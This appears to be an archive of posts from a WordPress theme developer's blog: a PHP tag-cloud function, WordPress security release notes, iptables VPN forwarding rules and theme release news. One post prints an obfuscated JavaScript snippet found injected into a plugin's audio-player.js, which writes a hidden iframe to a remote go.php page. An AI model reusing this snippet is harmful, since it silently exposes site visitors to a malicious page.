The function returns an array that contains each category name, the CSS class that should be applied to the given category, and the category ID for linking to the page showing only questions in that category.

<?php
function tagCloud($maximum=0) {
	$cats = array(); // create empty array

	$query = mysql_query("SELECT categories.catDesc, categories.catId, COUNT( questions.id ) AS totalQuestions FROM questions, categories WHERE questions.categoryId = categories.catId GROUP BY categories.catId;");
	while ($row = mysql_fetch_array($query)) {
		$cat = $row['catDesc'];
		$counter = $row['totalQuestions'];
		$catid = $row['catID'];

		// update $maximum if this term is more popular than the previous terms
		if ($counter> $maximum) $maximum = $counter;

		$percent = floor(($counter / $maximum) * 100);
		if ($percent <20) {
			$class = 'smallest';
		}
		elseif ($percent>= 20 and $percent <40) {
			$class = 'small';
		}
		elseif ($percent>= 40 and $percent <60) {
			$class = 'medium';
		}
		elseif ($percent>= 60 and $percent <80) {
			$class = 'large';
		}
		else {
			$class = 'largest';
		}
		$cats[] = array('term' => $cat, 'class' => $class, 'catid' => $catid);

	}
	return $cats;
}
?>

You’ll also need some CSS to style your tag cloud. This CSS is pretty much identical to what Steve published, I only made some minor changes to font sizes.

#tagcloud {
    width: 300px;
    background:#FFFFCC;
    color:#0066FF;
    padding: 10px;
    border: 1px solid #FFE7B6;
    text-align:center;
}

#tagcloud a:link, #tagcloud a:visited {
    text-decoration:none;
}

#tagcloud a:hover, #tagcloud a:active {
    text-decoration: underline;
    color: #000;
}

#tagcloud span {
    padding: 4px;
}

.smallest {
    font-size: 10px;
}

.small {
    font-size: 12px;
}

.medium {
    font-size:14px;
}

.large {
    font-size:16px;
}

.largest {
    font-size:18px;
}

To use the function, do something like this:

<div id="tagcloud">
<?php
$tagCloud = tagCloud();
foreach ($tagCloud as $t) {
	$cat = $t['term'];
	$class = $t['class'];
	$catid = $t['catid'];
	print "$cat";
}
?>
</div>

I am still testing this code, but so far it seems to do exactly what I need it to do. If you experience trouble with the code or if it doesn’t act as expected, please let me know in the comments. If you’ve got ideas on how to improve the function, I’d love to hear your thoughts as well!

Thomas Mackenzie alerted us to a problem where logged in users can peek at trashed posts belonging to other authors. If you have untrusted users signed up on your blog and sensitive posts in the trash, you should upgrade to 2.9.2. As always, you can visit the Tools->Upgrade menu to upgrade.

Thomas Mackenzie goes into much greater detail about the problem on his site. Check his site out for more info on why the 2.9.2 release was necessary.

It’s worth mentioning that the last remnants of the old SideBar Manager, or SBM, have now been removed from the codebase. It started out as a fully-fledged replacement for WP’s lacking widgets system and ended up as a patch-of-sorts to the widget system, allowing for widgets to be placed only on specified pages. But in the end, while the native widget system is still very much in need of an update, it didn’t feel right for K2 to try and cover that particular area of the administration interface. And besides, other plugins for doing just that exist already.

So instead of spending our time patching that system for an ever-changing WordPress, our time is probably better spent on more theme-specific functionality, like the rolling archives or livesearch systems, as well as keeping up with new WordPress features, like for instance Post Thumbnails.

Rather than break down all of what’s changed in recent versions of K2, I’m going to make it easy on myself and direct you to the K2 1.0 release announcement. Just know that Unwakeable 1.5.3 sports all the features found in K2 1.0.3. You can comment on this post or on the Unwakeable page with questions or comments.

This release addresses a handful of minor issues as well as a rather annoying problem where scheduled posts and pingbacks are not processed correctly due to incompatibilities with some hosts. If any of these issues affect you, give 2.9.1 a try. Download 2.9.1 or upgrade automatically from the Tools->Upgrade menu in your blog’s admin area.

WordPress 2.9.1 came less than a month after WordPress 2.9.

2.8.6 fixes two security problems that can be exploited by registered, logged in users who have posting privileges. If you have untrusted authors on your blog, upgrading to 2.8.6 is recommended.

The first problem is an XSS vulnerability in Press This discovered by Benjamin Flesch. The second problem, discovered by Dawid Golunski, is an issue with sanitizing uploaded file names that can be exploited in certain Apache configurations. Thanks to Benjamin and Dawid for finding and reporting these.

You can download WordPress 2.8.6 here.

I wanted to make a note of how to allow VPN connections in the event that the Firestarter website becomes inaccessible again, that’s basically the point of this post. The page on the Firestarter site that details VPN connections can be found here. This should apply to pretty much every Linux distribution, not just Ubuntu.

To allow VPN connections with the Microsoft VPN client, simply enter the following lines into /etc/firestarter/user-pre.

# Forward PPTP VPN client traffic
$IPT -A FORWARD -i $IF -o $INIF -p tcp --dport 1723 -m state --state NEW,ESTABLISHED,RELATED -j ACCEPT
$IPT -A FORWARD -i $IF -o $INIF -p 47 -m state --state NEW,ESTABLISHED,RELATED -j ACCEPT
$IPT -A FORWARD -i $INIF -o $IF -p 47 -m state --state NEW,ESTABLISHED,RELATED -j ACCEPT

And to allow VPN connections with the Cisco VPN client, enter the following lines into /etc/firestarter/user-pre.

# Forward Cisco VPN client traffic
$IPT -A FORWARD -i $IF -o $INIF -p udp --dport 500 -m state --state NEW,ESTABLISHED,RELATED -j ACCEPT
$IPT -A FORWARD -i $IF -o $INIF -p tcp --dport 500 -m state --state NEW,ESTABLISHED,RELATED -j ACCEPT
$IPT -A FORWARD -i $IF -o $INIF -p 50 -m state --state NEW,ESTABLISHED,RELATED -j ACCEPT
$IPT -A FORWARD -i $INIF -o $IF -p 50 -m state --state NEW,ESTABLISHED,RELATED -j ACCEPT

Finally, if you’re running a Microsoft VPN server and want to allow incoming PPTP VPN connections, add the following lines to /etc/firestarter/user-pre.

# Forward PPTP VPN connections to internal server
SERVER=192.168.0.100 # Internal VPN server

$IPT -A FORWARD -i $IF -o $INIF -p tcp --dport 1723 -m state --state NEW,ESTABLISHED,RELATED -j ACCEPT
$IPT -t nat -A PREROUTING -i $IF -p tcp --dport 1723 -j DNAT --to $SERVER
$IPT -A FORWARD -i $IF -o $INIF -p 47 -m state --state NEW,ESTABLISHED,RELATED -j ACCEPT
$IPT -t nat -A PREROUTING -i $IF -p 47 -j DNAT --to $SERVER 

That should pretty much cover it. If you are using OpenVPN, head over to the Firestarter VPN configuration page for details.

As you know over the past couple of months we have been working on the new features for WordPress 2.9. We have also been working on trying to make WordPress as secure as possible and during this process we have identified a number of security hardening changes that we thought were worth back-porting to the 2.8 branch so as to get these improvements out there and make all your sites as secure as possible.

The headline changes in this release are:

• A fix for the Trackback Denial-of-Service attack that is currently being seen.
• Removal of areas within the code where php code in variables was evaluated.
• Switched the file upload functionality to be whitelisted for all users including Admins.
• Retiring of the two importers of Tag data from old plugins.

You can download WordPress 2.8.5 here.

<?php if ( get_post_custom_values('comments') ): ?>

2. Comment out that if statement, so it should look like this when you’re done:

<?php //if ( get_post_custom_values('comments') ): ?>

3. You’re halfway done at this point. Now go to line 40, which should look like this:

<?php endif; ?>

4. Comment out this piece of code as well, so modify line 40 so it looks like the code below.

<?php //endif; ?>

5. Save the page.php file and you should be all set.

I will make this modification in the next release of Unwakeable so you won’t have to modify it yourself. You can expect to see a new version of Unwakeable released within a week.

Yesterday a vulnerability was discovered: a specially crafted URL could be requested that would allow an attacker to bypass a security check to verify a user requested a password reset. As a result, the first account without a key in the database (usually the admin account) would have its password reset and a new password would be emailed to the account owner. This doesn’t allow remote access, but it is very annoying.

The SANS Internet Storm Center had a nice post about this earlier today that details why WordPress 2.8.4 was necessary.

function advQuery(){
	var adv="http://google.com/";abs=unescape("%69%66%72%61%6D%65");Track="?sid=1";get=unescape("%6E%65%74");
	document.write("<"+abs+" src="+adv.substr(0,9)+unescape("\u0030\u0030")+adv.substr(9,5));
	document.write(get+"/go.php"+Track+" style=display:none><"+"/"+abs+">");
};advQuery();

I decided to just deactivate that plugin instead of deleting that piece of code from audio-player.js. This way there’s no chance audio-player.js will become infected again.

This release adds support for Threaded Comments and Child Themes. Styles have been improved. You can specify where Styles are stored at, activate multiple styles, and edit them in the WordPress Theme Editor. You can also now customize the Post Meta (the line that reads Published by John Doe…) without having to edit any code.

I plan on building the next version of Unwakeable in the next couple weeks and will likely base it off of K2 1.0-RC8.

Unwakeable 1.5.3 rc1 is up-to-date with K2 r776. K2 no longer includes the K2 Sidebar Manager. If you were using K2 Sidebar Modules and want to continue using it, you can download the plugin here.

There’s a new option on the Unwakeable Options page that allows you to customize top and bottom meta information for each post. The top meta information will be displayed directly under the title of a post. The bottom meta information will be displayed at the end of the posts content. You can use the following keywords to define what information you want to show: %author%, %categories%, %comments%, %date%, %tags% and %time%.

Have a look below to see what to enter in the top meta and bottom meta sections to display the same information that’s being displayed here.
Top Meta: Published by %author% on %date% at %time% %comments%
Bottom Meta: Categories: %categories% %tags%

You can download Unwakeable 1.5.3 rc1 from the Unwakeable page, or click here to download it directly.

The first thing you’ll notice about 2.7 is its new interface. From the top down, we’ve listened to your feedback and thought deeply about the design and the result is a WordPress that’s just plain faster. Nearly every task you do on your blog will take fewer clicks and be faster in 2.7 than it did in a previous version.

The latest stable version of Unwakeable, 1.5.1, seems to work just fine with WordPress 2.7, from what I’ve seen anyway. If you have any problems with Unwakeable 1.5.1 with WordPress 2.7, you may want to give Unwakeable 1.5.2 release candidate 1 a shot. As of this post, it’s current with K2 r739. Unwakeable 1.5.2 rc1 is currently running this site and appears to be very stable. I hope to have Unwakeable ready for inclusion in the WordPress theme directory by the time 1.5.2 is officially released.

If you have any problems with either of these versions of Unwakeable, please let me know by leaving at comment at the Unwakeable page.

The K2 Sidebar manager has been fixed to work with WordPress 2.6 via a plugin. The plugin is a single file named k2-disable-widgets.php and is located in the app/includes folder in Unwakeable 1.5.1. Simply copy that file to the wp-content/plugins folder and activate it as you would any other plugin.

Unwakeable 1.5.1 is up-to-date with K2 revision 708. If you want to stay current with Unwakeable development, see the changes list. Head over to the Unwakeable page to download Unwakeable 1.5.1.

UPDATE: If you’re using WordPress 2.6, you get a chance to preview a theme prior to making it active. The theme preview for Unwakeable 1.5.1 is blank due to the periods in the folder name. Even though the preview appears blank, Unwakeable will still work on your site just fine. If you want to see the preview, just rename the unwakeable-1.5.1 folder to unwakeable151 or simply unwakeable.